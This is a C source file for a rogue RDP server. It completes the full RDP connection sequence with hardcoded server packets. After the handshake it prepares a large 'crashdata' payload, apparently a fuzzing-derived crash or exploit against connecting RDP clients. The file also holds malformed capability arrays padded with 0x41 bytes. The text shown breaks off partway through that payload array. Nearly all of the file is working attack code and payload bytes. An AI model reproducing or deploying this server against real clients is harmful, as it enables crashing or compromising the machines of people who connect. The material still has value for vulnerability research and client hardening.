#include<stdio.h>


#include "RdpServer.h"
#include <openssl/ssl.h>
#include <openssl/x509.h>
#include <openssl/err.h>
#include <stdio.h>
#include <stdlib.h>


#define DEFAULT_BUFLEN 4096
static SOCKET ListenSocket = INVALID_SOCKET;
static SOCKET ClientSocket = INVALID_SOCKET;


static SSL_CTX * ctx;
static SSL * ssl = NULL;
HANDLE hr = NULL;


void HexOutput(int length, unsigned char* buf)
{
	int i;
	char asc = '.';
	char line[100];
	memset(line, 0, 80);
	char *tmp = line;

	for (i = 0; i < length; i++)
	{
		if (!(i % 16))
		{
			line[57] = 0x20;
			i ? printf("%s\n", line) : 1;
			memset(line, 0x20, 80);
			tmp = line;
			sprintf_s(tmp, 10, "%.8x ", i);
			tmp += 9;
		}
		sprintf_s(tmp, 4, "%.2x ", buf[i]);
		if (buf[i] > 0x20 && buf[i] <= 0x7e)
			asc = buf[i];
		else
			asc = '.';
		sprintf_s(line + 58 + (i % 16), 2, "%c", asc);
		tmp += 3;
	}
	*tmp = 0x20;
	printf("%s\n", line);
}

void PrintReceiveData(int length, unsigned char* buf)
{
	// fuzz ״̬²ʾ
	printf("\n[+] Receive:  \n");
	HexOutput(length, buf);
	printf("[+] Bytes received: %d\n", length);
}

void PrintSentData(int length, unsigned char* buf)
{
	// fuzz ״̬²ʾ
	printf("\n[-] Sent:  \n");
	HexOutput(length, buf);
	printf("[-] Bytes Sent: %d\n", length);
}

const char *
$strerror(int err)
{
	static char* msg = NULL;
	switch (err) {
	default:
		if (msg == NULL)
			free(msg);
		FormatMessageA(
			FORMAT_MESSAGE_ALLOCATE_BUFFER |
			FORMAT_MESSAGE_FROM_SYSTEM |
			FORMAT_MESSAGE_IGNORE_INSERTS,
			NULL,
			err,
			MAKELANGID(LANG_NEUTRAL, SUBLANG_DEFAULT),
			(LPSTR)&msg,
			0, NULL);
		return msg;
		break;
	}
}

static void ssl_clear()
{
	if (ssl != NULL)
	{
		SSL_shutdown(ssl);
		SSL_free(ssl);
		ssl = NULL;
	}
	if (ClientSocket != INVALID_SOCKET)
	{
		closesocket(ClientSocket);
		ClientSocket = INVALID_SOCKET;
	}

	//closesocket(ListenSocket);
	//SSL_CTX_free(ctx);

	//EVP_cleanup();
}

static int ssl_recv_data(unsigned char *data, int data_length)
{
	int rcvd = 0;
	int ssl_err = 0;
	int erro = 0;
	int index = 0;

	while (data_length > 0)
	{
		rcvd = SSL_read(ssl, data, data_length);
		ssl_err = SSL_get_error(ssl, rcvd);
		int a = WSAGetLastError();
		if (ssl_err == SSL_ERROR_SSL)
		{
			if (SSL_get_shutdown(ssl) & SSL_RECEIVED_SHUTDOWN)
			{
				printf("Remote peer initiated ssl shutdown.\n");
				ssl_clear();
				return 0;
			}
			printf("ssl_err == SSL_ERROR_SSL\n");
			ssl_clear();
			return 0;
		}

		if (ssl_err == SSL_ERROR_WANT_READ || ssl_err == SSL_ERROR_WANT_WRITE)
		{
			rcvd = 0;
		}
		if (ssl_err != SSL_ERROR_NONE)
		{
			// printf(0, "SSL_read: %d (%s)\n", ssl_err, $strerror(WSAGetLastError()));
			printf("UNKNOWN - SSL - network error\n");
			printf("ssl_err != SSL_ERROR_NONE\n");
			ssl_clear();
			return 0;
		}
		data_length -= rcvd;
	}
	// printf("SSL_read over\n");
	return rcvd;
}

static  int respose_to_rdp_client(unsigned char *data, int data_length)
{
	int iSendResult = 0;

	iSendResult = SSL_write(ssl, data, data_length);

	if (iSendResult <= 0)
	{
		printf("SSL_write FAILD");
		// ERR_print_errors_fp(stdout);
		ssl_clear();
		return -1;
	}
	// mychange
	PrintSentData(iSendResult, data);

	return 0;
}

static int ssl_recv_loop(unsigned char *recvbuf, unsigned char* channel)
{
	int index = 0;
	UINT8 version = 0;
	UINT16 data_length = 0;
	int iResult = 0;
	int i = 0;

	memset(recvbuf, 0, DEFAULT_BUFLEN);

	if (!ssl_recv_data(recvbuf, 4))
		return 0;
	// mychange
	printf("\n[+] Head:\n");
	printf("%.8x ", 0);
	for (int j = 0; j < 4; j++)
	{
		printf("%.2x ", recvbuf[j]);
	}
	//PrintReceiveData(4, recvbuf);

	version = recvbuf[index];
	if (version == 3)
	{
		index += 2;
		data_length = (recvbuf[index] << 8) | recvbuf[index + 1];
	}
	else if (version != 3)
	{
		index += 1;
		if (recvbuf[index] >= 0x80)
		{
			//index += 1;
			unsigned char data1 = recvbuf[index] - 0x80;
			data_length = (data1 << 8) | recvbuf[index + 1];
		}
		else
		{
			data_length = recvbuf[index];
		}
	}

	memset(recvbuf, 0, 4);

	iResult = ssl_recv_data(recvbuf, data_length - 4);

	// mychange
	PrintReceiveData(iResult, recvbuf);
	if (version == 3)
	{
		*channel = recvbuf[7];
	}

	// mychange
	return iResult;
}

static int ssl_established()
{
	ssl = SSL_new(ctx);
	SSL_set_fd(ssl, ClientSocket);

	if (SSL_accept(ssl) <= 0)
	{
		printf("sslssl_u_stdw_clear\n");
		ssl_clear();
		return -1;
	}
	else
	{
		printf("sslӳɹ\n");
		return 0;
	}
}

int start_establish()
{
	unsigned char recvbuf[DEFAULT_BUFLEN];
	int recvbuflen = DEFAULT_BUFLEN;
	unsigned char name_respose[] = { 0x03, 00, 00, 0x13, 0x0e, 0xd0, 00, 00, 0x12, 0x34, 00, 0x02, 0x1f, 0x08, 00, 0x01, 00, 00, 00 };
	// unsigned char name_respose[] = { 0x03, 00, 00, 0x13, 0x0e, 0xd0, 00, 00, 0x12, 0x34, 00, 0x02, 0x01, 0x08, 00, 0x01, 00, 00, 00 };//win7

	int i = 0;
	int iSendResult = 0;
	int iRecvResult = 0;
	iRecvResult = recv(ClientSocket, (char*)recvbuf, recvbuflen, 0);

	if (iRecvResult > 0)
	{
		PrintReceiveData(iRecvResult, recvbuf);

		iSendResult = send(ClientSocket, (const char*)name_respose, 19, 0);
		if (iSendResult == SOCKET_ERROR) {
			printf("send failed with error: %d\n", WSAGetLastError());
			closesocket(ClientSocket);
			WSACleanup();
			return -1;
		}
		// mychange
		PrintSentData(iSendResult, name_respose);
		return 0;
	}
	else
	{
		printf("start establish failed!\n");
		return -1;
	}
}

static int recv_loop()
{
	unsigned char recvbuf[DEFAULT_BUFLEN];
	int iResult = 0;
	//[DEFAULT_BUFLEN];
	UINT8 version = 0;;
	UINT16 data_length = 0;
	unsigned char mcs_connect[] = {
		0x03, 00, 00, 0x7e, 0x02, 0xf0, 0x80, 0x7f, 0x66, 0x74, 0x0a, 0x01, 00, 0x02, 0x01, 00, 0x30, 0x1a, 0x02, 0x01, 0x22, 0x02,
		0x01, 0x03, 0x02, 0x01, 00, 0x02, 0x01, 0x01, 0x02, 0x01, 00, 0x02, 0x01, 0x01, 0x02, 0x03, 00, 0xff, 0xf8, 0x02, 0x01,
		0x02, 0x04, 0x50, 00, 0x05, 00, 0x14, 0x7c, 00, 0x01, 0x2a, 0x14, 0x76, 0x0a, 0x01, 0x01, 00, 0x01, 0xc0, 00, 0x4d, 0x63,
		0x44, 0x6e, 0x3a, 0x01, 0x0c, 0x10, 00, 0x0c, 00, 0x08, 00, 0x0b, 00, 00, 00, 0x06, 00, 00, 00, 0x03, 0x0c, 0x10, 00, 0xeb,
		0x03, 0x04, 00, 0xec, 0x03, 0xed, 0x03, 0xee, 0x03, 0xef, 0x03, 0x02, 0x0c, 0x0c, 00, 00, 00, 00, 00, 00, 00, 00, 00, 0x04,
		0x0c, 0x06, 00, 0xf0, 0x03, 0x08, 0x0c, 0x08, 00, 0x01, 0x03, 00, 00
	};
	unsigned char mcs_connect_id[] = {
	0x03, 00, 00, 0x0b, 0x02, 0xf0, 0x80, 0x2e, 00, 00, 0x08 };
	unsigned char mcs_connect_channel_1[] = {
	0x03, 00, 00, 0x0f, 0x02, 0xf0, 0x80, 0x3e, 00, 00, 0x08, 0x03, 0xf1, 0x03, 0xf1 };
	unsigned char mcs_connect_channel_2[] = {
	0x03, 00, 00, 0x0f, 0x02, 0xf0, 0x80, 0x3e, 00, 00, 0x08, 0x03, 0xeb, 0x03, 0xeb };
	unsigned char mcs_connect_channel_3[] = {
	0x03, 00, 00, 0x0f, 0x02, 0xf0, 0x80, 0x3e, 00, 00, 0x08, 0x03, 0xf0, 0x03, 0xf0 };
	unsigned char mcs_connect_channel_4[] = {
	0x03, 00, 00, 0x0f, 0x02, 0xf0, 0x80, 0x3e, 00, 00, 0x08, 0x03, 0xec, 0x03, 0xec };
	unsigned char mcs_connect_channel_5[] = {
	0x03, 00, 00, 0x0f, 0x02, 0xf0, 0x80, 0x3e, 00, 00, 0x08, 0x03, 0xed, 0x03, 0xed };
	unsigned char mcs_connect_channel_6[] = {
	0x03, 00, 00, 0x0f, 0x02, 0xf0, 0x80, 0x3e, 00, 00, 0x08, 0x03, 0xee, 0x03, 0xee };
	unsigned char mcs_connect_channel_7[] = {
	0x03, 00, 00, 0x0f, 0x02, 0xf0, 0x80, 0x3e, 00, 00, 0x08, 0x03, 0xef, 0x03, 0xef };

	unsigned char server_license[] = {
	0x03, 00, 00, 0x22, 0x02, 0xf0, 0x80, 0x68, 00, 0x01, 0x03, 0xeb, 0x70, 0x14, 0x80, 00, 00, 00, 0xff, 0x03, 0x10, 00, 0x07, 00,
	00, 00, 0x02, 00, 00, 00, 0x04, 00, 00, 00 };

	unsigned char Multitransport_Request[] = {
	 0x03, 00, 00, 0x2a, 0x02, 0xf0, 0x80, 0x68, 00, 0x01, 0x03, 0xf0, 0x70, 0x1c, 0x02, 00, 00, 00, 0x02, 00, 00, 00, 0x01, 00, 00,
	 00, 0x2d, 0xcb, 0xb3, 0xa1, 0x36, 0x51, 0xe2, 0xa4, 0x24, 0xe8, 0x43, 0x7c, 0x15, 0x11, 0x14, 0x31 };

	unsigned char hexData[109] = {
		0x6B, 0x00, 0xE7, 0x00, 0x33, 0x75, 0x05, 0x0B, 0xFF, 0xE9, 0x31, 0xF7, 0x18, 0x00, 0x02, 0x50,
		0x17, 0x01, 0x00, 0x00, 0x00, 0x00, 0x6D, 0xED, 0xFF, 0xED, 0xFB, 0x17, 0x00, 0x02, 0x50, 0x17,
		0x01, 0x00, 0x00, 0x00, 0x00, 0x6D, 0xED, 0xFF, 0xED, 0x12, 0xFF, 0xFF, 0x41, 0x41, 0x41, 0x41,
		0x41, 0x41, 0x0B, 0xFF, 0xE9, 0x31, 0xF7, 0x18, 0x00, 0x12, 0xFF, 0xFF, 0x41, 0x41, 0x41, 0x41,
		0x41, 0x41, 0x0B, 0xFF, 0xE9, 0x31, 0xF7, 0x18, 0x00, 0x02, 0x50, 0x17, 0x01, 0x00, 0x41, 0x41,
		0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0xFF, 0xFF, 0xFF, 0xFF,
		0xFF, 0xFF, 0xE8, 0x4B, 0x7D, 0x6D, 0x00, 0x41, 0x41, 0xDA, 0x62, 0x00, 0x52
	};

	unsigned char hexDassta[102] = {
		0x64, 0x00, 0xE7, 0x00, 0x33, 0x75, 0x05, 0x0B, 0xFF, 0xE9, 0x31, 0xF7, 0x18, 0x00, 0x02, 0x50,
		0x17, 0x01, 0x00, 0x00, 0x00, 0x00, 0x6D, 0xED, 0xFF, 0xED, 0x2E, 0x4A, 0x00, 0x02, 0x50, 0x17,
		0x03, 0xE8, 0xED, 0xFF, 0xED, 0x12, 0xFF, 0xFF, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x0B, 0xFF,
		0xE9, 0x31, 0xF7, 0x18, 0x00, 0x12, 0xFF, 0xFF, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x0B, 0xFF,
		0xE9, 0x31, 0xF7, 0x18, 0x00, 0x02, 0x50, 0x17, 0x01, 0x00, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
		0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xE8, 0x4B,
		0x7D, 0x6D, 0x00, 0x41, 0x41, 0xDA
	};

	unsigned char server_confirm_active_r2[] = { 0x03, 00, 0x00, 0x74, 0x02, 0xf0, 0x80, 0x68, 00, 0x01, 0x03, 0xeb, 0x70, 0x66, 0x64, 0x00, 0xE7, 0x00, 0x33, 0x75, 0x05, 0x0B, 0xFF, 0xE9, 0x31, 0xF7, 0x18, 0x00, 0x02, 0x50,
		0x17, 0x01, 0x00, 0x00, 0x00, 0x00, 0x6D, 0xED, 0xFF, 0xED, 0x2E, 0x4A, 0x00, 0x02, 0x50, 0x17,
		0x03, 0xE8, 0xED, 0xFF, 0xED, 0x12, 0xFF, 0xFF, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x0B, 0xFF,
		0xE9, 0x31, 0xF7, 0x18, 0x00, 0x12, 0xFF, 0xFF, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x0B, 0xFF,
		0xE9, 0x31, 0xF7, 0x18, 0x00, 0x02, 0x50, 0x17, 0x01, 0x00, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
		0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xE8, 0x4B,
		0x7D, 0x6D, 0x00, 0x41, 0x41, 0xDA };

	unsigned char server_confirm_active_r[] = { 0x03, 00, 0x00, 0x61, 0x02, 0xf0, 0x80, 0x68, 00, 0x01, 0x03, 0xeb, 0x70, 0x53, 0x53, 0x00,
	0x67, 0x67, 0x67, 0x67, 0x67, 0x67, 0x73, 0x67, 0x7F, 0x67, 0x67, 0x67, 0x02, 0x00, 0x67, 0x40,
		0x00, 0x00, 0x00, 0x64, 0x67, 0x67, 0x61, 0xB3, 0x01, 0x52, 0x00, 0x01, 0x52, 0x00, 0x01, 0xFF,
		0x33, 0x17, 0x00, 0x05, 0x00, 0x00, 0x67, 0x67, 0x67, 0x67, 0x67, 0x67, 0x67, 0x67, 0x02, 0x00,
		0x67, 0x67, 0x67, 0x67, 0x01, 0x64, 0x67, 0x67, 0x61, 0x67, 0x7F, 0x60, 0x47, 0x67, 0x67, 0xFF,
		0x12, 0x40, 0xEA, 0x03, 0xEA, 0x03, 0xEA, 0x03, 0x98, 0x98, 0x98, 0x98, 0x98, 0x98, 0x98, 0x98,
		0x5D };

	unsigned char hexData88[44] = {
		0xE7, 0xD4, 0xD4, 0xD4, 0xB3, 0xD4, 0x20, 0xFF, 0xFF, 0x00, 0xEA, 0x00, 0x02, 0x00, 0x00, 0x01,
		0x00, 0x00, 0x7F, 0xE8, 0xFF, 0xD4, 0xD4, 0xD4, 0x2E, 0x10, 0x00, 0x82, 0x7F, 0xFF, 0xFF, 0xFF,
		0xB3, 0xD4, 0x00, 0xFF, 0xFF, 0x00, 0xEA, 0x00, 0x02, 0x00, 0x00, 0x01
	};

	unsigned char server_demand[] = {
	0x03, 00, 0x01, 0xd8, 0x02, 0xf0, 0x80, 0x68, 00, 0x01, 0x03, 0xeb, 0x70, 0x81, 0xc9, 0xc9, 0x01, 0x11, 00,
	0xea, 0x03, 0xea, 0x03, 0x01, 00, 0x04, 00, 0xb3, 0x01, 0x52, 0x44, 0x50, 00, 0x11, 00, 00, 00, 0x09, 00,
	0x08, 00, 0xea, 0x03, 00, 00, 0x01, 00, 0x18, 00, 0x01, 00, 0x03, 00, 00, 0x02, 00, 00, 00, 00, 0x1d, 0x04,
	00, 00, 00, 00, 00, 00, 0x01, 0x01, 0x14, 00, 0x0c, 00, 0x02, 00, 00, 00, 0x40, 0x06, 00, 00, 0x0a, 00, 0x08,
	00, 0x06, 00, 00, 00, 0x08, 00, 0x0a, 00, 0x01, 00, 0x19, 00, 0x19, 00, 0x1b, 00, 0x06, 00, 0x03, 00, 0x0e,
	00, 0x08, 00, 0x01, 00, 00, 00, 0x02, 00, 0x1c, 00, 0x20, 00, 0x01, 00, 0x01, 00, 0x01, 00, 0x80, 0x07, 0x38,
	0x04, 00, 00, 0x01, 00, 0x01, 00, 00, 0x1e, 0x01, 00, 00,
	00, 0x1d, 00, 0x60, 00, 0x04, 0xb9, 0x1b, 0x8d, 0xca,
	0x0f, 00, 0x4f, 0x15, 0x58, 0x9f, 0xae, 0x2d, 0x1a, 0x87, 0xe2, 0xd6, 00, 0x03, 00, 0x01, 0x01, 0x03, 0x12, 0x2f,
	0x77, 0x76,
	0x72, 0xbd, 0x63, 0x44, 0xaf, 0xb3, 0xb7, 0x3c, 0x9c, 0x6f, 0x78, 0x86, 00, 0x04, 00, 00, 00, 00, 00,
	0xa6, 0x51, 0x43, 0x9c, 0x35, 0x35, 0xae, 0x42, 0x91, 0x0c, 0xcd, 0xfc, 0xe5, 0x76, 0x0b, 0x58, 00, 0x04, 00, 00,
	00, 00, 00, 0xd4, 0xcc, 0x44, 0x27, 0x8a, 0x9d, 0x74, 0x4e, 0x80, 0x3c, 0x0e, 0xcb, 0xee, 0xa1, 0x9c, 0x54, 00,
	0x04, 00, 00, 00, 00, 00, 0x03, 00, 0x58, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 0x40,
	0x42, 0x0f, 00, 0x01, 00, 0x14, 00, 00, 00, 0x01, 00, 00, 00, 0xaa, 00, 0x01, 0x01, 0x01, 0x01, 0x01, 00, 00, 00,
	0x01, 00, 00, 0x01, 00, 00, 00, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 00, 0x01, 0x01, 0x01, 0x01, 00, 00,
	00, 00, 0xa1, 0x06, 0x06, 00, 0x40, 0x42, 0x0f, 00, 0x40, 0x42, 0x0f, 00, 0x01, 00, 00, 00, 00, 00, 00, 00, 0x12,
	00, 0x08, 00, 0x01, 00, 00, 00, 0x0d, 00, 0x58, 00, 0x75, 0x03, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00,
	00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00,
	00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00,
	00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 0x17, 00, 0x08, 00, 0xff, 00, 00, 00, 0x18, 00, 0x0b, 00, 0x02, 00, 00,
	00, 0x03, 0x0c, 00, 0x1a, 00, 0x08, 00, 0x2b, 0x48, 0x09, 00, 0x1c, 00, 0x0c, 00, 0x52, 00, 00, 00, 00, 00, 00, 00,
	0x1e, 00, 0x08, 00, 00, 00, 00, 00, 00, 00, 00, 00 };

	unsigned char p1[] = {
	0x03,00,00,0x24,0x02,0xf0,0x80,0x68,00,0x01,0x03,0xeb,0x70,0x16,0x16,00,0x17,00,0xea,0x03,0xea,0x03,0x01,00,00,0x02,0x16,00,0x1f,00,00,00,0x01,00,00,00 };
	unsigned char p2[] = {
	0x03,00,00,0x28,0x02,0xf0,0x80,0x68,00,0x01,0x03,0xeb,0x70,0x1a,0x1a,00,0x17,00,0xea,0x03,0xea,0x03,0x01,00,00,0x02,0x1a,00,0x14,00,00,00,0x04,00,00,00,00,00,00,00 };
	unsigned char p3[] = {
	0x03,00,00,0x28,0x02,0xf0,0x80,0x68,00,0x01,0x03,0xeb,0x70,0x1a,0x1a,00,0x17,00,0xea,0x03,0xea,0x03,0x01,00,00,0x02,0x1a,00,0x14,00,00,00,0x02,00,0xf1,0x03,0xea,0x03,00,00 };
	unsigned char p4[] = {
	0x03,00,00,0x28,0x02,0xf0,0x80,0x68,00,0x01,0x03,0xeb,0x70,0x1a,0x1a,00,0x17,00,0xea,0x03,0xea,0x03,0x01,00,00,0x02,0x1a,00,0x28,00,00,00,00,00,00,00,0x03,00,0x04,00 };




	//int index = 0;
	unsigned char channel = 0;

	//printf("ssl_recv_data header\n");
	if (!ssl_recv_loop(recvbuf, &channel))
		return 0;

	respose_to_rdp_client(mcs_connect, 126);

	// Channel Connection 
	printf("\n**********************************\n");
	printf("[*] Channel Connection\n");
	printf("**********************************\n");
	if (!ssl_recv_loop(recvbuf, &channel))
		return 0;
	if (!ssl_recv_loop(recvbuf, &channel))
		return 0;
	respose_to_rdp_client(mcs_connect_id, 11);


	// add channel 
	if (!ssl_recv_loop(recvbuf, &channel))
		return 0;
	respose_to_rdp_client(mcs_connect_channel_1, 15);

	if (!ssl_recv_loop(recvbuf, &channel))
		return 0;
	respose_to_rdp_client(mcs_connect_channel_2, 15);

	if (!ssl_recv_loop(recvbuf, &channel))
		return 0;
	respose_to_rdp_client(mcs_connect_channel_3, 15);

	if (!ssl_recv_loop(recvbuf, &channel))
		return 0;
	respose_to_rdp_client(mcs_connect_channel_4, 15);

	/*
	if (!ssl_recv_loop(recvbuf, &channel))
	   return 0;
	respose_to_rdp_client(mcs_connect_channel_5, 15);

	if (!ssl_recv_loop(recvbuf, &channel))
	   return 0;
	respose_to_rdp_client(mcs_connect_channel_6, 15);

	if (!ssl_recv_loop(recvbuf, &channel))
	   return 0;
	respose_to_rdp_client(mcs_connect_channel_7, 15);
	*/

	// Client Info PDU
	printf("\n**********************************\n");
	printf("[*] Client Info PDU\n");
	printf("**********************************\n");
	if (!ssl_recv_loop(recvbuf, &channel))
		return 0;

	// Licensing
	printf("\n**********************************\n");
	printf("[*] Licensing\n");
	printf("**********************************\n");
	respose_to_rdp_client(server_license, 34);

	// capabilities Exchange
	printf("\n**********************************\n");
	printf("[*] Capabilities Exchange\n");
	printf("**********************************\n");
	respose_to_rdp_client(server_demand, 472);
	if (!ssl_recv_loop(recvbuf, &channel))
		return 0;


	// Connection Finalization
	printf("\n**********************************\n");
	printf("[*] Connection Finalization\n");
	printf("**********************************\n");
	// Client Synchronize PDU
	if (!ssl_recv_loop(recvbuf, &channel))
		return 0;
	// Client Control PDU - Cooperate
	if (!ssl_recv_loop(recvbuf, &channel))
		return 0;
	// Client Control PDU - Request Control
	if (!ssl_recv_loop(recvbuf, &channel))
		return 0;

	// Persistent Key List PDU
	if (!ssl_recv_loop(recvbuf, &channel))
		return 0;
	/*
	if (!ssl_recv_loop(recvbuf, &channel))
	   return 0;
	if (!ssl_recv_loop(recvbuf, &channel))
	   return 0;
	if (!ssl_recv_loop(recvbuf, &channel))
	   return 0;
	*/

	// Client Font List PDU
	if (!ssl_recv_loop(recvbuf, &channel))
		return 0;

	// Server Synchronize PDU
	respose_to_rdp_client(p1, 36);
	// Server Control PDU - Cooperate
	respose_to_rdp_client(p2, 40);
	// Server Control PDU - Granted Control
	respose_to_rdp_client(p3, 40);
	// Server Font Map PDU
	respose_to_rdp_client(p4, 40);

	printf("\n**********************************\n");
	printf("[*] Connection Over\n");
	printf("**********************************\n");


	unsigned char crashdata[14359] = {
		// 15
		0x03, 0x00, 0x38, 0x17, 0x02, 0xF0, 0x80, 0x68, 0x00, 0x01, 0x03, 0xEB, 0x70, 0xb8, 0x08,


		// 6
		0x08, 0x38, 0x17, 0x00, 0xEA, 0x03,

	0xEA, 0x03, 0x01, 0x00, 0x20, 0x02, 0x08, 0x38, 0x02, 0x23, 0xC9, 0x21, 0x00, 0x00, 0x34, 0x00, 
	0x30, 0x00, 0x00, 0x00, 0x06, 0x00, 0x00, 0x00, 0x04, 0x00, 0x03, 0x02, 0x00, 0x00, 0x09, 0x00, 
	0x08, 0x00, 0x03, 0x09, 0x12, 0xBC, 0x01, 0x00, 0x04, 0x00, 0x03, 0xEF, 0x1A, 0x04, 0x14, 0x00, 
	0xC8, 0x40, 0x84, 0x00, 0x05, 0x05, 0x05, 0x1C, 0x80, 0xA1, 0x83, 0x5F, 0x1C, 0xFF, 0x5F, 0x1C, 
	0x84, 0x00, 0x82, 0xDF, 0x02, 0xFF, 0xFF, 0x0F, 0x0A, 0x3F, 0x3C, 0x05, 0x05, 0xA0, 0x00, 0x20, 
	0x00, 0x05, 0x00, 0x05, 0x00, 0x9C, 0x00, 0x1C, 0x00, 0xEF, 0x1A, 0x36, 0x00, 0x00, 0x00, 0x00, 
	0x03, 0x84, 0x01, 0x22, 0x0C, 0x05, 0x40, 0x1C, 0x41, 0x85, 0xFF, 0xFF, 0x84, 0xEF, 0x1A, 0xAE, 
	0x12, 0x0B, 0x12, 0x88, 0x09, 0xC0, 0x0B, 0x67, 0x09, 0x84, 0x88, 0x09, 0x0B, 0x12, 0xAE, 0x12, 
	0xEF, 0x1A, 0x19, 0x88, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xCE, 0x12, 0x88, 0x11, 
	0x32, 0x64, 0x77, 0x85, 0xC0, 0x0B, 0xDE, 0x8C, 0x84, 0x77, 0x85, 0x32, 0x64, 0x88, 0x11, 0xAE, 
	0x12, 0x1D, 0x84, 0x2B, 0x12, 0x12, 0x64, 0xD6, 0x5C, 0xF4, 0x33, 0xC0, 0x0B, 0x6A, 0xAE, 0x84, 
	0xF4, 0x33, 0xD6, 0x5C, 0x32, 0x64, 0x2B, 0x12, 0x1D, 0x83, 0x88, 0x09, 0x57, 0x7D, 0xD3, 0x2B, 
	0x7D, 0xB3, 0x23, 0x83, 0xD3, 0x2B, 0x57, 0x7D, 0x88, 0x09, 0x1D, 0x82, 0x67, 0x09, 0x58, 0x7D, 
	0x7F, 0x72, 0x1B, 0x82, 0x58, 0x7D, 0x67, 0x09, 0x1E, 0x81, 0x37, 0x7D, 0xC0, 0x0F, 0x40, 0x00, 
	0x81, 0x37, 0x7D, 0x1F, 0x81, 0x17, 0x75, 0xC0, 0x0F, 0x23, 0x08, 0x81, 0x17, 0x75, 0x00, 0x00, 
	0xC0, 0x0F, 0xC0, 0x01, 0x00, 0x00, 0x81, 0xF7, 0x74, 0xC0, 0x0F, 0x61, 0x00, 0x81, 0xF7, 0x74, 
	0x1F, 0x81, 0xD6, 0x74, 0xC0, 0x0F, 0xDF, 0x00, 0xDC, 0x21, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 
	0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x81, 0xB6, 0x74, 0x3F, 0x81, 0xB6, 0x74, 0x1F, 0xD0, 
	0x7F, 0x03, 0x00, 0x01, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0x00, 0x00, 0x00, 0x81, 0x17, 0x7D, 0xC0, 0x0F, 0x5F, 0x09, 0x81, 0x17, 0x7D, 0x1F, 0xD0, 0x40, 
	0x20, 0x00, 0x01, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0xC0, 0x0F, 0x00, 0x38, 0x00, 
	0x00, 0x81, 0x37, 0x85, 0xC0, 0x0F, 0x20, 0x00, 0xD0, 0x60, 0x00, 0xF8, 0x01, 0x00, 0x00, 0x00, 
	0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xC0, 0x0F, 0x00, 0x08, 0x00, 0x40, 0x81, 
	0x57, 0x85, 0xC0, 0x0F, 0x63, 0x18, 0x81, 0x57, 0x85, 0x1F, 0x81, 0x58, 0x8D, 0xC0, 0x0F, 0x20, 
	0x00, 0x81, 0x58, 0x8D, 0x1F, 0x81, 0x78, 0x8D, 0xC0, 0x0F, 0xE0, 0x08, 0x81, 0x78, 0x8D, 0x1E, 
	0x83, 0x88, 0x09, 0x57, 0x8D, 0xD3, 0x43, 0xC0, 0x0D, 0x20, 0x78, 0x83, 0xD3, 0x43, 0x57, 0x8D, 
	0x88, 0x09, 0x1D, 0x84, 0x2B, 0x12, 0x11, 0x6C, 0xD6, 0x74, 0xF3, 0x4B, 0xC0, 0x0B, 0x61, 0x00, 
	0x84, 0xF3, 0x4B, 0xD6, 0x74, 0x11, 0x6C, 0x2B, 0x12, 0x1D, 0x84, 0xCE, 0x12, 0x88, 0x11, 0x11, 
	0x64, 0x57, 0x8D, 0xC0, 0x0B, 0x4B, 0xD6, 0x84, 0x57, 0x8D, 0x11, 0x64, 0x88, 0x11, 0xCE, 0x12, 
	0x1D, 0x84, 0xEF, 0x1A, 0xCE, 0x12, 0x2B, 0x12, 0x88, 0x09, 0xC0, 0x0B, 0xFF, 0x9C, 0x84, 0x88, 
	0x09, 0x2B, 0x12, 0xCE, 0x12, 0xEF, 0x1A, 0x19, 0x84, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0x00, 0x0D, 0x0D, 0x1F, 0x01, 0x50, 0x02, 0x89, 0x02, 0x00, 0x07, 0x00, 0x05, 0x00, 0x23, 0x00, 
	0x1C, 0x00, 0xFF, 0x7F, 0x36, 0x01, 0x00, 0x00, 0x00, 0x36, 0x00, 0x00, 0x00, 0x00, 0x03, 0xD4, 
	0x00, 0xA0, 0x0C, 0x05, 0x10, 0x40, 0xD6, 0xFF, 0xFF, 0xCC, 0x11, 0x13, 0x84, 0x11, 0x13, 0x11, 
	0x13, 0x11, 0x13, 0x11, 0x13, 0xC0, 0x00, 0xC0, 0x01, 0xC0, 0x00, 0x61, 0x00, 0x73, 0x6F, 0x12, 
	0x9D, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0x6F, 0x12, 0x6F, 0x12, 0xFF, 0xFF, 0xFF, 0xFF, 0x6F, 
	0x12, 0x6F, 0x12, 0xFF, 0xFF, 0xFF, 0xFF, 0x6F, 0x12, 0x6F, 0x12, 0x4E, 0x12, 0x4E, 0x12, 0xFF, 
	0xFF, 0x4E, 0x12, 0x4E, 0x12, 0x4E, 0x12, 0xFF, 0xFF, 0x4E, 0x12, 0x4E, 0x12, 0xFF, 0xFF, 0x4E, 
